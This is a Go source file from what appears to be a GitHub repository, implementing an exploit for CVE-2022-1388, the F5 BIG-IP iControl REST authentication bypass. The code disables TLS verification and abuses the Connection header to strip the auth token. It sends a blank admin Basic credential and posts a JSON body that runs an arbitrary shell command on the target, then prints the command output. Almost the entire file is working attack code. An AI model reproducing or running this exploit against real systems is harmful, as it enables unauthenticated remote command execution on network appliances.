-
Notifications
You must be signed in to change notification settings - Fork 2
/
CVE-2022-1388.go
51 lines (45 loc) · 1.28 KB
/
CVE-2022-1388.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
package main
import (
"crypto/tls"
"fmt"
"io/ioutil"
"net/http"
"strings"
)
func Cve_2022_1388() {
tr := &http.Transport{
TLSClientConfig: &tls.Config{
InsecureSkipVerify: true,
},
}
client := &http.Client{Transport: tr}
//client := &http.Client{Timeout: time.Second * 10}
req, err := http.NewRequest("POST", url+filepath1, strings.NewReader("{\"command\":\"run\",\"utilCmdArgs\":\"-c "+c+"\"}"))
if err != nil {
}
req.Header.Add("Accept-Encoding", "gzip, deflate")
req.Header.Add("Accept", " */*")
req.Header.Add("Connection", "close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host")
req.Header.Add("Content-type", "application/json")
req.Header.Add("X-F5-Auth-Token", "anything")
req.Header.Add("Authorization", "Basic YWRtaW46")
req.Header.Add("Content-Length", "42")
resp, err := client.Do(req)
if err != nil {
fmt.Println(err)
return
}
defer resp.Body.Close()
body, err1 := ioutil.ReadAll(resp.Body)
if err1 != nil {
fmt.Println(err1)
return
}
if resp.StatusCode == 200 {
fmt.Println("StatusCode:", resp.StatusCode, "CVE-2022-1388漏洞存在")
fmt.Printf("%s\n", c)
fmt.Println(string(body))
} else {
fmt.Println("StatusCode:", resp.StatusCode, "CVE-2022-1388漏洞不存在")
}
}